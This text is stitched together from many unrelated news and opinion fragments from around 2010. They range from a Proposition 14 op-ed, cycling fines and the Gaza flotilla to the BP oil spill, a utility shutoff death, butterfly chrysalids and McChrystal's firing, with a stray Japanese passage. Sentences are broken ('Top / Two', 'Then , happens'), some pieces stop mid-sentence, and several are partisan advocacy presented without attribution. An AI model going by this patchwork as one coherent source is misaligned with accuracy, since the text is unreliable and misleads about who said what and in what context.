A study released online May 12 in The Cochrane Library found caffeine helped prevent errors among shift workers and those who work at night .
More information
The U.S. National Library of Medicine has more on caffeine .
1. Top Two wo n’t work .
Proponents claim that Top Two will reduce partisanship in elections , the supposed cause of dysfunction in California state government .
There is nothing in the experience of the states that have used Top Two , Louisiana and Washington , to suggest that it reduces partisanship .
To be honest , backers of Proposition 14 should be saying that Top Two entrenches incumbents .
When Washington used Top Two for the first time in 2008 , out of 123 state legislative races , 8 Congressional races , and 8 statewide races , only a single incumbent was defeated in the primary – a state legislator who had a personal scandal and would almost certainly have been defeated under any system .
The claim that Top Two will reduce gridlock in California ’s legislature is baseless .
In the words of election law expert Richard Winger , " The real cause of gridlock in the California legislature is the rule that budgets can only be passed by a two - thirds vote of each house of the legislature ...
The real solution to solve California ’s budget gridlock is to eliminate the rule that the budget can only be passed with two - thirds of the legislators in each house ...
We should let the majority party in the legislature govern .
If the voters elect a majority party , let that majority party pass its budget .
If we do n’t like that budget , we not only have recall , initiative or referendum , we can defeat the majority party in the next election and replace it . "
Top
Two would front - load the election season with an early , make - or - break primary .
In the short season before the primary , the advantage to candidates with the money to bombard voters with advertising would be multiplied many times over .
In an era where special interests and their front groups can funnel billions of dollars into political campaigns , independent candidates who run on good ideas and grassroots organizing will find it virtually impossible to compete with well - funded political insiders .
It ’s unrealistic , too , to expect that the press will counter this imbalance by providing the voters with fair and balanced coverage .
The media already pays more attention to political horse races than to candidates ’ positions on the issues .
If Top Two is passed , it ’s improbable that the media will suddenly make the extra effort to fully inform the voters about all their choices before the primary .
More likely , media outlets will simply try to pick the likely Top Two winners based on how well known and well - funded they are , and largely ignore the other candidates .
The claim that Top Two will solve California ’s political problems has no factual basis .
In fact , the evidence suggests that it could make existing problems worse .
Perhaps most unrealistic is the idea that limiting voters ’ choices in the general election will somehow make politics better .
Aside from incumbent politicians , who honestly believes that giving voters less choice in elections will improve anything ?
2. Top Two is unpopular .
In 2004 , California voters rejected Top Two by voting 54 % against Proposition 62 .
In 2008 , voters in nearby Oregon rejected Ballot Measure 65 , which would have established a Top Two system , in a landslide of 66 % .
On the other hand , instant runoff voting , an improved voting system that protects voter choice , has won approval from voters in San Francisco , Berkeley , Davis , and Oakland by margins of 56 % , 72 % , 55 % , and 69 % , respectively .
Charter amendments authorizing use of instant runoff voting , or IRV , have passed in San Leandro and Santa Clara counties .
After using IRV for the first time , 82 % of San Francisco voters said they preferred IRV to the city ’s previous election system .
The numbers do n’t lie : instant runoff voting is as popular as Top Two is unpopular .
So why are political insiders pushing for Top Two , which has recently been rejected by a majority of Californians and a full two - thirds of voters in Oregon ?
3. Top Two is undemocratic .
By design , Top Two restricts voter choice .
By cutting down the field of candidates in primary season , which is notoriously dominated by big- spending special interests and party bosses , Top Two guarantees that most independent and third - party candidates , as well as grassroots candidates in the major parties , will be out of the race before most voters and journalists are even paying attention .
Opposition to Top
Two from numerous election reform groups , as well as voices from across the political spectrum , demonstrates Americans ’ basic understanding that limiting voter choice runs counter to the idea of democracy .
Voters should have the right to vote for the candidates and parties they agree with , and the public discourse suffers when independent voices are cut out of the debate .
Proponents of Top
Two often claim that it wo n’t hurt third parties and independents .
Richard Winger of Ballot Access News , America ’s leading expert on ballot access laws , explains why this is false : " In practice , [ Top Two ] would eliminate minor party and independent candidates from the November ballot .
We know this is true because Washington State tried the system for the first time in 2008 , and that ’s what happened .
Washington , for the first time since it became a state in 1889 , had no minor party or independent candidates in November for any statewide state race or for any congressional race . "
Top
Two would effectively restrict voter choice to two parties – or one party in many districts .
Although the Constitution makes no mention of political parties , the practical effect of Top Two would be to give the Democratic and Republican parties a monopoly on power .
Which leads to the next problem with Top Two :
4. Top Two is unconstitutional .
Americans ’ First Amendment right to association gives us the right to support any political party we choose .
The right of political parties to run candidates for office is violated when the electoral system is set up to make it easy for dominant parties to push everyone else off the ballot .
If the Democratic and Whig parties had passed laws to protect incumbent politicians and ruling parties in the 19th century , we would probably never have had a President Abraham Lincoln or a Republican Party .
Proposition 14 would immediately disqualify the Libertarian and Peace and Freedom parties , further violating their members ’
First Amendment right to free association .
America ’s founders warned that political parties could try to use their power to further their own narrow self - interest .
What would they think about a proposed law that would give two parties a virtual stranglehold on elections ?
5. Top Two is unnecessary .
Instant runoff voting , an improved voting system used in San Francisco and other California cities , actually delivers the benefits that Top Two is supposed to , without the drawbacks that make Top Two worse than the status quo .
Even with more than two candidates on the ballot , instant runoff voting , or IRV , ensures that the candidate with the broadest support will be the winner .
Under IRV , voters rank the candidates in their order of preference – as election reform advocates say , " IRV is as easy as 1 , 2 , 3 . "
If no candidate receives a majority of first - place votes , the candidate with the least votes is eliminated , and votes for the eliminated candidate are transferred to voters ’ next choices .
This process continues until one candidate has a majority .
Instant runoff voting has several clear advantages .
It eliminates the common problem of " spoiled elections " , in which one candidate wins without majority support .
In the same way , it eliminates the problem of similar candidates " splitting the vote " , and actually encourages positive campaigning , since it creates an incentive for candidates to appeal to their rivals ’ supporters .
Finally , since IRV produces a majority winner no matter how many candidates are on the ballot , it allows for an informative and broad debate during election season , with voters exposed to a range of views before making their decision .
Top
Two is a deeply flawed system in comparison with instant runoff voting .
With Top Two , vote - splitting will still be a problem in multi-candidate races .
Negative campaigning will become the norm under Top Two : like a game of king of the mountain , candidates will throw each other in the mud in hopes of coming out on top .
Realistically , Top
Two will not accomplish what its proponents claim , aside from producing false " majority winners " selected by a plurality of a minority of voters .
In other words , when 10 % of voters turn out for the Top Two primary and vote 40 % for Candidate A and 35 % for Candidate B , that does n’t mean that the other 92.5 % of voters are going to feel that they have a satisfactory choice in either Candidate A or B .
If Top Two passes , the political discourse will suffer , because the period between June primaries and November elections , currently the most active time for public debate , will be purged of the independent , third party , and grassroots candidates who so often bring fresh , innovative ideas to politics .
Instead , the range of opinions voters hear will be restricted to two , often coming from candidates in the same party .
Instead of front - loading the election cycle with a make - or - break Top Two primary , instant runoff voting would allow all candidates to compete in the general election , when the vast majority of voters actually turn out .
Voters would get to hear and consider viewpoints from a wider range of candidates in the general election , not just two candidates who may well belong to the same party .
After considering what all the candidates have to say , voters could get out their instant runoff ballots and support the candidates they agree with most , without fear of inadvertently helping the candidates they agree with least .
Maybe that ’s why voters prefer IRV : instead of feeling pressured to support the lesser of two evils , they can support their favorite candidates – whether liberal , conservative , moderate , Republican , Democrat , Green , Libertarian , Peace and Freedom , American Independent , or just plain independent – and know that their vote wo n’t be wasted .
Instant runoff voting produces winners with broad majority support more reliably than Top Two , and without the problems that make Top Two worse than no reform .
Why should voters accept an unnecessary and flawed system , when a better system is already gaining ground throughout California ?
The top five reasons to reject Top Two – plus one
To recapitulate , Top Two wo n’t work – at least not like proponents claim it will .
Top
Two is unpopular – voters recently rejected it in California and Oregon .
Top
Two is undemocratic – it restricts voter choice and suppresses independent voices outside the two - party political establishment .
Top
Two is unconstitutional – it violates our civil rights by giving two parties an effective monopoly on power .
Finally , Top
Two is unnecessary , when instant runoff voting is better on all counts .
One last reason to vote against Proposition 14 : Top Two is a top - down proposal .
Ballot measures like Proposition 14 always seem to come from political insiders , usually with the backing of wealthy special interests to help advertise the alleged benefits of Top Two to a skeptical public .
Indeed , Proposition 14 was placed on the ballot as part of a vote - trading deal by State Senator Abel Maldonado , who felt Top Two could help his ambitions for higher office .
Governor Schwarzenegger has funneled $ 500,000 from his personal PAC into the campaign for Top Two , including money from corporations like Chevron , PG&E , and Wal - Mart .
Corporations that have donated directly to the Proposition 14 effort include Hewlett Packard , Blue Shield of California , and Pacific Life Insurance Company .
In the words of election reformer Christina Tobin , who is running as the Libertarian candidate for California Secretary of State , " It is safe to assume that large corporations regulated by the state want to have government in their pockets .
They want to maintain the two - party status quo . "
Instant runoff voting , on the other hand , always comes from the grassroots .
Campaigns for IRV are led by active citizens , community organizers and voters ’ rights groups like FairVote , Californians for Electoral Reform , and the Coalition for Free and Open Elections ( all of which are opposing Proposition 14 ) .
Referendum victories show that voters like the idea of IRV , and exit polls show that voters like how it works in practice .
If the goal is to fix California ’s election system so that it will produce winners with majority support , why are Proposition 14 ’s backers pushing the flawed , unpopular Top Two system instead of instant runoff voting ?
All Californians who value democratic freedoms and sincerely want better elections should vote no on Proposition 14 .
Even members of the Republican and Democratic parties , if they heed the founders ’ warnings about political factions , should recognize the danger of cementing the Democratic - Republican monopoly on power and vote no .
You do n’t have to be a libertarian to value the civil and political liberties of your fellow Americans .
For supporters of electoral reform , Top Two is just a distraction from the real goals of instant runoff voting and other worthy reforms like proportional representation .
We have better options than Top Two – options that we might not know about today , if Top Two had been in place earlier to stifle independent voices in the public arena .
Here ’s what you can do to help stop Top Two :
Share this article with your friends and family .
Write a letter to the editor of your local newspaper explaining why you oppose Proposition 14 .
Learn more about the campaign to save independent politics in California at StopTopTwo.org .
Lena Douglas was fined $ 292 forcycling past a tram on Swanston Street .
Credit : Paul Rovere
She had pedalled past the tram slowly after passengers had got off '' to get in front of the tram before it started moving ' ' , she said , to avoid '' getting squished between [ it and ] a parked vehicle ' ' .
However , the police saw it differently , and fined Lena $ 292 .
Under the old laws , she would not have done anything wrong : she came to a stop before slowly passing the tram .
But rules that came into effect last November mean that both cyclists and drivers behind trams must stay put while tram doors remain open , or pedestrians are on the road at a tram stop .
'' I am not sure that what I did was worth a $ 292 fine , '' said Lena , who did not know the law had changed .
Several other fines for breaking the law on a bicycle have gone up , to match the fines for cars .
The fine for running a red light on a bike , for which 750 riders were fined last year , is now also $ 292 , the same as in a car .
The fine for not wearing a helmet has jumped to $ 146 - which is likely to bring in at least $ 1 million in revenue for the state government this financial year .
Last year , when the fine was $ 58 , there were 6600 cyclists fined .
The officer in charge of Victoria Police 's bicycle unit , Sergeant Arty Lavos , said cyclists without a helmet were a particular focus .
'' Helmet offences are enforced daily by all our bicycle patrol units and general duties units , '' he said .
'' It is the most fundamental safety rule . ''
Bicycle Victoria recently had its lawyers help one cyclist who was fined for passing a tram under the new laws get off on a technicality .
But the lobby group - which received about 12 per cent of its $ 11.8 million in funding last year from the state government - says it is right that cyclists now face serious fines .
Spokesman Garry Brennan said that if bicycle riders wanted equal treatment on the road , they had to accept equal responsibility .
They should be '' prepared to cop equivalent fines to other road users if it means we are accorded the full rights we are entitled to under the law , '' Mr Brennan said .
Thirteen female European activists , arrested for their participation in the flotilla to Gaza , attacked Immigration Authority officers escorting them to the airport for their deportation , the Interior Ministry reported Wednesday .
Op - Ed
The ship of horrors Yoram Ettinger Instead of goodwill , Gaza - bound flotilla featured knives , terror connections
The ship of horrors
The ministry said the young women began to riot in the police bus conveying them to the airport .
" They yelled and cursed , " said an officer of the authority 's Oz unit .
" They called us names and cursed Israel .
When we arrived at Ben Gurion International Airport , two of them attacked me screaming , tried to push me , slap me , and scratch me .
They yelled , ' free Palestine ' and ' Israel is a terror state ' .
They only calmed down after an entire team apprehended them . "
The officer said he was especially hurt by the behavior because Oz , the Prison Service , and the police had treated the flotilla activists so kindly since their arrival .
" We gave them excellent , considerate , and respectful service .
We took care of all of their needs , " he said .
Surprisingly , Turkish voices have defended this stance .
One of the Turkish Red Cross workers who came to Israel in order to care for passengers of the flotilla agreed during a talk with Ynet that injured Turkish civilians " received excellent service from the medical teams and proper medical care " .
The worker , who is currently awaiting the arrival of 20 Turkish patients at the airport for their deportation , said a number of seriously injured citizens would remain in Israel for a few days until their condition improved .
http://www.foruminnovacio.com/
女性らしい体型とは、どのようなスタイルのことをいうのでしょうか。
体のメリハリがはっきりしていて、腰はくびれ、足は引き締まり、かつ胸やお尻などは女性らしい丸みや膨らみがあるのが女性らしい体型です。
細すぎる体型なら、肉をつければそこそこ女性らしくなるというイメージもあるようですが、単に体重を増やすだけで
Many local officials have expressed concern that the moratorium on some drilling operations that the president declared could end up harming the Gulf Coast economy as it reels from the oil spill .
President Obama said that if a commission he has appointed to study the safety of offshore drilling is able to reach conclusions about how such drilling can be done safely , he would be open to allowing drilling to resume sooner .
“ We discovered that companies like BP , who had provided assurances that they had failsafe , back - up , redundant systems , in fact not only did n’t have failsafe systems but had no idea what to do when those failsafe systems broke down , ” he said .
In response to the president ’s comments , BP said later on Friday that it would be sending another payment this month to people and businesses who lost income due to the oil spill .
With the second payment , it said , it will have spent $ 84 million reimbursing people for their loss of income .
“ We deeply regret the impact the oil spill has had on individuals and businesses , and understand the need for quick and reasonable compensation , ” Doug Suttles , its chief operating officer , said in a statement .
Image Gov. Charlie Crist of Florida , Lisa Jackson , the the Environmental Protection Agency ’s administrator and Adm .
Thad W. Allen of the Coast Guard greeted President Obama in New Orleans on Friday .
Credit ... Luke Sharrett / The New York Times
As for efforts to stanch the flow of oil from the leaking well , Adm .
Thad W. Allen of the Coast Guard , who is commanding the federal response to the disaster , said earlier in the day that some oil had been collected in a cap that was placed over the well and that it was beginning to be funneled up to a ship on the surface .
But he noted that a great deal of oil was still escaping , by design , through vents in the cap .
The vents were intended to let some oil out in order to keep cold Gulf water from rushing in and forming icy hydrates that could block the flow of captured oil to the surface .
Until those vents are closed , it will not be clear whether the cap is seated tightly enough on the cut end of the well ’s riser pipe to prevent large amounts of oil from continuing to pour into the Gulf of Mexico , Admiral Allen said .
He said that current plans call for closing those vents on Friday .
Amazingly , a € 720 billion Eurozone bailout may not be the biggest news to come out of Europe tonight .
Bigger , perhaps , is the fact that the ECB will begin buying securities on the secondary market -- quantitative easing -- according to Olli Rehn , EU Monetary Affairs Commissioner ( per Bloomberg ) .
On Thursday , Jean - Claude Trichet 's seeming unwillingness to make this step was likely a contributor to the big tailspin .
Apparently he 's seen that he can't afford this .
Also : ECB independence is now dead .
For this news to come out just as political leaders are crafting their own bailout basically confirms that Trichet answers to them in the final count .
San Francisco police arrested an Albany man Friday on suspicion of carrying out a six - minute rampage in an SUV in which he mowed down four bicyclists before smashing his vehicle into a light pole and running away .
Police have not released the suspect 's name because he is being " medically evaluated " for psychological and other problems and has not been booked , Police Chief George Gascón said at a news conference .
The man , who is in his 40s , was arrested at about 1 p.m. after he went to the Albany Police Department and fabricated a story about his car being carjacked in San Francisco , police said .
Investigators had said that the 2008 blue Nissan Rogue crossover sport utility vehicle used in Wednesday 's attacks in the Mission District and Potrero Hill was registered to a Berkeley address , but they kept a tight lid on clues until after the arrest .
Police said Friday that after the driver - who , it turns out , owned the Rogue - crashed his car , he left behind his wallet , keys and a cell phone .
Investigators went to the Berkeley address , " but he had moved and we could not contact him , " said Sgt. Jon Kasper .
Inspectors then " conducted surveillance with the Albany Police Department , " and moved in when he surfaced at the department with his carjacking tale , Kasper said .
The suspect was arrested on four counts each of attempted murder , assault with a deadly weapon and felony hit and run .
Gascón said he hoped to release the name and photo of the suspect over the weekend .
" We feel very strongly we have the suspect , " he said .
The attacks began at 9:43 p.m. Wednesday on a quiet stretch of Harrison Street , near 23rd Street in the Mission District .
Witnesses said the SUV came speeding south on the street , hit the first bicyclist head on , and then hit the second less than a block away at 24th Street .
The driver roared east about a mile to the corner of 23rd and Pennsylvania streets , where he hit the third cyclist .
Then he sped several blocks north to Potrero Hill , where he hit his last victim at the corner of Missouri and 17th streets and slammed to a stop against a light pole .
The driver ran away , witnesses said , leaving shattered pieces of his vehicle and a parked Jeep that he also hit .
The Pennsylvania Street victim , 39 - year - old Rory Madden of San Francisco , was treated at the scene for scrapes and bruises , then sent home .
The other three victims - all men , ranging in age from their 20s to their 40s - were more seriously injured but are expected to survive , said San Francisco General Hospital spokeswoman Rachael Kagan .
Their names have not been released .
" They 're all looking better today , but they still do n't want to talk to anyone , " Kagan said .
One man was upgraded Friday to serious condition from critical .
Another victim was also in serious condition , and the third was in fair condition .
ALBANY — What chutzpah !
An $ 18 million tuition subsidy devised by Gov. Paterson as a political gift to the city ’s Orthodox Jewish community has emerged as an 11th - hour sticking point in budget talks , The Post has learned .
The unprecedented expansion of the state ’s Tuition Assistance Program – derisively dubbed “ Rabbi TAP ” by frustrated budget negotiators — guarantees grants of up to $ 5,000 a year to at least 3,660 students at a few dozen rabbinical schools in the city and suburbs .
Paterson slipped the program into his 2010 - 11 spending plan while he was planning to run for election and desperately courting political support from the Orthodox .
The controversy comes at a time when he ’s demanding massive cuts to public colleges and universities .
The Assembly is seeking to kill the program , sources said .
That has sparked a clash with Senate Finance Chairman Carl Kruger ( D - Brooklyn ) , who calls the subsidy a “ must have . ”
“ Obviously , it ’s totally inappropriate to advance a significant new program , when we ’re cutting SUNY , when we ’re cutting CUNY , when we ’re cutting community colleges , ” said Assembly Higher Education Chairwoman Deborah Glick ( D - Manhattan ) .
Students at the American Musical and Dramatic Academy in Manhattan , a non-religious private school , would also be eligible for TAP , thanks to tortured legislative language used in an attempt to ensure it passes constitutional muster .
Paterson spokesman Morgan Hook said the program was intended to “ create parity ” in aid for rabbinical students .
brendan.scott@nypost.com
A team of Spanish scientists has studied the bacteria -- micro organisms that are " essential " for important processes such as nitrogen and carbon - fixing and decomposition of matter -- in the Tablas de Daimiel National Park .
The scientists discovered 265 new phylum groups by using DNA analysis .
Researchers from the University of Valencia ( UV ) and the Biomedical Research Centre Network ( CIBER ) in Epidemiology and Public Health studied the structure of the bacterial community in four types of environments in the Tablas de Daimiel National Park in Ciudad Real , Spain .
These were the aquatic environment , the first few centimetres of sediment representing the interface between water and sediment ( superficial sediment ) , deeper sediment ( lower sediment ) , and the biofilms that grow on the areas bordering the water and non-inundated soil .
" This semiarid wetland is home to a high diversity of bacterial groups , with relatively low dominance values , which indicates a good division between the various taxonomic groups found , " Giuseppe D'Auria , lead author of the study and a researcher at the UV's Cavanilles Institute for Biodiversity and Evolutionary Biology .
According to the study published in the journal Aquatic Microbial Ecology , the four environments studied reveal similarities and differences : " the water sample is more similar to that of the water - sediment interface ( upper sediment ) , while the biofilm sample is more similar to that of the deeper sediment . "
The results also show a high number of still unknown sequences , which were found in all the samples analysed , making the Tablas de Daimiel " a reservoir for bacterial biodiversity and of key importance in maintaining it , " the scientist explains .
265 new phylum groups
The researchers extracted the total DNA contained in the samples .
Using molecular biology techniques , they obtained the DNA sequences of a bacterial gene called 16S , which represents a kind of signature or label for each bacterium .
" Bioinformatic analysis enabled us to draw up profiles of the bacterial distributions in each environment studied , " explains D'Auria .
By comparing the sequences found with those of international bacterial diversity databases , the team managed to find sequences that were still unknown to science , discovering 265 new phylum groups .
" Most of the phylum groups found were related to the large Proteobacteria group .
" These were found in progressively smaller quantities in the samples from the lower sediment , biofilms , water and upper sediment , " the scientist points out .
Cyanobacteria , which carry out photosynthesis in an identical way to micro algae and higher plants , were found primarily in the superficial sediment sample , at the interface with the water column .
The Tablas de Daimiel National Park suffers from continuous problems in terms of water availability and quality , which are primarily related to farming practices in the area and nearby .
However , despite all this , a large variety of plants , land and aquatic animals and micro organisms live in this semi-arid wetland .
It was declared a Special Protection Area for Birds ( SPAB ) in 1979 because of its great ecological value , and was also included on the list of internationally - important wetlands in 1982 .
The research team believes it is of " vital importance " to ensure that this area " does not stop being the wetland that it once was , a cradle of biodiversity . "
Fiji 's military - backed government has given News Limited three months to sell the Fiji Times or see it be forced to close .
The country 's interim government has passed a new decree which will regulate media in the island nation .
News Limited , which is the sole owner of the Fiji Times newspaper , has expressed outrage at the decree .
Fiji's new Media Decree 2010 was gazetted on Monday by the military - backed interim regime .
The final decree , as highlighted in a draft released earlier this year , will create a media authority and tribunal based on similar models used to manage the media in Singapore .
It will also limit foreign ownership of media operations to just 10 per cent .
News Limited has been given three months to comply or face closure .
On its website , the Fiji Times quoted the head of the attorney - general 's office , Aiyaz Sayed - Khaiyum , as saying that all directors and at least 90 per cent of shareholders of media organisations in Fiji must be citizens of the nation .
" I wish to make it clear that any media organisation which fails to comply with this requirement shall cease to operate as a media organisation , and shall also be liable for an offence under the Decree , " the Fiji Times quoted Mr Sayed - Khaiyum as saying .
" At this stage , Fiji Times is the media organisation that needs to comply with the ownership requirements . "
News Limited chairman John Hartigan says the the jobs of nearly 200 Fiji Times staff and nearly 1,000 others involved in selling the newspaper are now at risk .
The company 's corporate affairs director Greg Baxter says the latest move is an an attack on free speech .
But Fiji 's interim attorney - general has rejected the criticism , saying it is in Fiji 's interests to have have its media owned by Fijians .
News Limited will now explore any options it may have to remain involved in media in Fiji .
CONCORD , N.H. —
A woman who needed powered oxygen equipment to breathe died after she did not pay the power bill and a utility shut off her electricity , police said Friday .
State officials were investigating whether any regulations were broken .
Kay Phaneuf , 53 , died Thursday at Caritas Holy Family Hospital in Methuen , Mass .
She had been in critical condition since her husband found her unconscious Monday about an hour after power was cut to their home in Salem .
“ She ca n’t survive without it , ” Salem Police Capt .
Shawn Patten said of the oxygen equipment .
“ They cut the power to the house , the power to whatever machine she had went out , and that was it . ”
There was a backup battery on the machine , but it had not been activated , he said .
Such devices often have alarms indicating when power is cut , but it was n’t clear whether Phaneuf ’s had one .
The electricity bill had n’t been paid , Patten said , but state regulations require written notice to be given two weeks before a shutoff .
The utility , National Grid , declined to say Friday why the power was shut off , citing privacy and confidentiality reasons .
But it said it was possible Phaneuf and her husband had n’t kept the company apprised of her needs .
“ It ’s my understanding that we followed the proper procedures that would include notifying customers that their service was going to be shut off , ” said National Grid spokesman David Graves .
He said the company has started an internal review and is trying to ensure the right safeguards are in place to prevent a recurrence .
A meter worker arrived at the house at about 9 a.m.
Monday to shut off the power , Graves said .
He knocked on the door and rang the doorbell but got no response and turned off the power .
National Grid got a call about an hour later from Salem police asking that a supervisor get to the house , Graves said .
The supervisor arrived at 10:30 a.m. and was told by police that a resident had been taken to a hospital .
Police were not pursing criminal charges , but the New Hampshire Public Utilities Commission was investigating .
Gov. John Lynch asked the agency to conduct a broad review of utility companies ’ procedures on power shutoffs .
Customers who require electricity for medical equipment can prevent National Grid from shutting off service by sending a letter from their doctor .
Under state regulations , customers need to renew such information every 60 days ; Graves said National Grid gives customers 90 days to renew .
Phaneuf ’s account has had such a medical notice in the past , but it was possible it had lapsed , Graves said .
Graves said he did n’t know whether the power had been shut off there before .
Lynch said Friday that the Utilities Commission should assess the “ adequacy of policies and safeguards related to power shutoffs ” and whether utilities are following them .
He asked for a report by July 30 .
Utilities in every state keep “ medical priority lists ” designed to track who depends on power for life , but an Associated Press survey last year found huge state - to - state variations , suggesting only a fraction of patients know they ’re available .
In December 2008 , when New Hampshire suffered one of its worst power failures in history during an ice storm , a disabled man who died without power to run his oxygen equipment had not told the fire or police departments to keep a watch over him during outages .
Having good friends at a variety of car dealers is really cool , especially today .
This morning , a new CTS - V Coupe was stopping by a local dealer , and a good friend of mine snapped a pic for me because he knows that I would sell his soul for it .
Without further adieu , here it is .
Just sit back and appreciate it ’s beauty , because nothing else needs to be said .
This guy has to be a winner in the “ do as I say , not as I do ” contest .
David Jungerman of Raytown , Missouri posted a large sign on a semi - truck along a major highway .
The sign reads :
Are You A Producer or Parasite
Democrats – Party of Parasites
However , a quick check of a farm subsidy database shows that Jungerman has received over a million dollars in government aid .
Jungerman claims “ Crop subsidies are different . ”
Well , yes , obviously .
They are different because you receive them .
Researchers from the Wyss Institute for Biologically Inspired Engineering at Harvard and Harvard Medical School have engineered photosynthetic bacteria to produce simple sugars and lactic acid .
This innovation could lead to new , environmentally friendly methods for producing commodity chemicals in bulk .
Their research findings appear in the June issue of Applied and Environmental Microbiology .
This photosynthetic factory could also reduce the carbon dioxide emissions associated with transporting sugar globally from producing countries ; lead to greater availability of biodegradable plastics ; and allow capture of harmful CO2 emissions from power plants and industrial facilities .
In addition to its positive environmental impact , the technology offers potential economic advantages .
Because the production methods use photosynthesis -- the process by which living things are assembled using only CO2 and sunlight -- the cost of making sugars , lactic acid , and other compounds would be significantly lower than traditional methods .
" What we 're doing is using genetic engineering to get organisms to act the way we want them to — in this case producing food additives , " said Wyss Institute senior staff scientist Jeffrey Way , Ph.D. " These discoveries have significant practical implications in moving toward a green economy . "
In addition to Dr. Way , researchers on this effort include Wyss Institute core faculty member Professor Pamela Silver , Ph.D. , also of Harvard Medical School ; and Henrike Niederholtmeyer , Bernd T. Wolfstadter , and David Savage , Ph.D. , all of Harvard Medical School .
Sugar is primarily produced from sugar cane , which grows only in tropical and subtropical climates .
By enabling production almost anywhere in the world , this living cellular manufacturing plant could greatly reduce the cost and emissions associated with transporting millions of tons of sugar to consumers every year .
It could also expand the availability of biodegradable plastics by reducing the cost of lactic acid , a key building block in their production .
The current work by Dr. Way and Dr. Silver 's team is the latest innovation in a wide - ranging program in which the Wyss Institute is working with various partner institutions to develop environmentally sustainable ways to produce biofuels , hydrogen , and other high value chemicals and food additives .
" Our mission at the Wyss Institute is to use Nature 's design principles to create solutions in medicine , manufacturing , energy , and architecture that will lead to a more sustainable world , " said Don Ingber , Ph.D. , M.D. , Founding Director of the Wyss Institute .
" This work is an important step in that direction . "
Explore further Scientists use nature 's design principles to create specialized nanofabrics
Image Credit
However , the chrysalis can come in many different colors .
Below is the chrysalis of the Cloudless Sulphur butterfly - Phoebis sennae .
The chrysalis of the butterfly looks , close up , alien and perhaps even a little frightening .
Yet it is one of the four stages of the life of a butterfly and without these bizarre looking enclosures we would not have the beauty of butterflies .
There always has to be a beginning in this process and above you can see a Painted Lady caterpillar beginning the transformation .
The butterfly emerges two weeks later .
The abdomen is white and still inside the shell of the chrysalis .
Various silk strands from the caterpillar stage are in the upper right corner of the picture .
The colorful wings seen here at the top of the picture have yet to unfurl and harden .
The pupal stage ( called chrysalis in the Lepidoptera ) is only found in insects that can be described as holometabolous ( a marvelous word if ever there was one ) .
This is a term which is applied to any insect group that undergoes a complete metamorphosis during the transition from embryo through larva , pupa and adult ( sometimes known as imago ) .
Chrysalids come in a variety of sizes but the shape is generally similar throughout .
What is quite remarkable , of course , is the emergence of a creature so vastly different in its adult form than it was in its immature period .
Here a gorgeous monarch butterfly emerges from its chrysalid .
The Monarch butterfly will soon leave the empty shell of its chrysalid ( known as an exuvium ) behind .
Although what is left behind looks translucent in the case of the Monarch the name itself comes from the Greek – chrysos – which means gold .
This came about because of the color of many chrysalids – a metallic golden sheen that must have greatly enamored the ancients .
Others , like the monarch can be a fairly standard green color – but what better than this to hide it away from other animals that might wish to make lunch out of it ?
This small , it can hold no fear ( ? ) .
Imagine it one hundred times larger and it is perhaps something you would call in Ellen Ripley to deal with .
Most chrysalids are formed in the open and are attached to the surface of a plant ( most often that which the caterpillar feeds upon ) .
They spin a silky pad which acts like velcro and allows them to stay firmly attached to the plant .
Something else which helps is the set of hooks – called cremaster – that they have at the tip of their abdomen and these are used as an additional ‘ fixative ’ .
The process of the caterpillar creating its chrysalis is quite amazing as you can see below .
The European Swallowtail caterpillar shown here has sensed it is time to go on towards its adult form .
You can see the silky pad half way down the abdomen .
The cremaster are located at its top of the abdomen .
These two strategies will keep it locked on to the branch while it changes .
Slowly but surely the chrysalis forms .
For a little while it is wet and flexible but within two hours the pupa is firmly enclosed within .
The chrysalis stage of the butterfly could be described , you might think , with one word – still .
This is true of most butterflies where there is either little or no movement whatsoever .
This is described as sessile but some butterflies pupae can move their abdominal segments .
They do this to warn away predators as growth and differentiation occurs within the chrysalis .
The European Swallowtail above will soon become this beautiful butterfly .
Let 's take a look at another transformation .
The whole process of metamorphosis has more than a little of the Ugly Duckling around it .
Take for example this dull looking ( some might say ugly ) chrysalis .
This Camberwell Beauty ( ) does n’t look terribly attractive but inside the chrysalis something remarkable is waiting to get out .
Then , happens .
Eclosure is the name for emergence from the pupae .
The pharate ( the inbetween and very short stage between pupa and imago ) splits open the chrysalis and emerges – most butterflies will do this in the morning .
It will soon leave behind the chrysalis case , which once abandoned is known as an exuvium .
The wings are expanded by pumping haemolymph in to the veins in its wings .
Haemolymph is to butterflies what blood is to us .
The wings dry out and stiffen and soon the butterfly is ready to take to the skies .
The transformation from pupa to imago – which seems so sudden and remarkable – is known as metamorphosis ( but the word really refers to the whole process from egg to adult ) .
However , in the case of the Camberwell blue seen here – you ca n’t help but refer to the very last stage as a metamorphosis in its own right .
Why was General McChrystal fired ?
25 June 2010
Reactions within the US establishment to the firing of Gen. Stanley McChrystal indicate that disparaging remarks by McChrystal and his aides concerning President Obama and other civilian officials published in a Rolling Stone article were not the principal cause of his dismissal .
Rather , the article brought to a head the deepening crisis arising from the failure of the US military to suppress the popular resistance in Afghanistan to Washington ’s colonial - style war .
Dissatisfaction with McChrystal ’s leadership had been mounting within the Obama administration since the failure of the offensive in Marjah launched last February .
The decision announced earlier this month to delay for at least three months the assault on Kandahar was widely seen as an embarrassing setback .
Despite McChrystal ’s reputation as a ruthless practitioner of counterinsurgency warfare , responsible for the killing of thousands of Iraqis , the general has more recently been the target of growing criticism that the effectiveness of the operation in Afghanistan was being undermined by his excessive concern over civilian casualties .
That concern has nothing to do with humanitarian considerations .
Rather , it is based on the cold calculation — the Rolling Stone article refers to McChrystal 's " insurgent math " — that for every innocent person killed , ten new enemies are created .
The article , written by Michael Hastings , deals relatively briefly with the remarks of McChrystal and his aides about US civilian officials in Afghanistan .
They are predictably crude , and could hardly have come as a surprise to Obama , let alone to the Pentagon .
They are familiar with the fascistic and debased character of McChrystal ’s entourage .
Hastings concisely describes the general ’s staff as “ a handpicked collection of killers , spies , geniuses , patriots , political operators and outright maniacs . ”
The comments made by McChrystal about Obama , Vice President Joseph Biden and special envoy Richard Holbrooke have generated the most media attention .
But Hastings devotes far more space relating the complaints of American soldiers that McChrystal is tying their hands by enforcing rules of engagement which limit the use of air strikes and mortar fire against potential civilian targets and restrict the ability of US troops to enter the homes of Afghan civilians .
Hastings writes that “ McChrystal has issued some of the strictest directives to avoid civilian casualties that the US military has ever encountered in a war zone . ”
He continues : “ But however strategic they may be , McChrystal ’s new marching orders have caused an intense backlash among his own troops .
Being told to hold their fire , soldiers complain , puts them in greater danger .
‘ Bottom line ? ’ says a former Special Forces operator who has spent years in Iraq and Afghanistan , ‘ I would love to kick McChrystal in the nuts .
His rules of engagement put soldiers ’ lives in even greater danger .
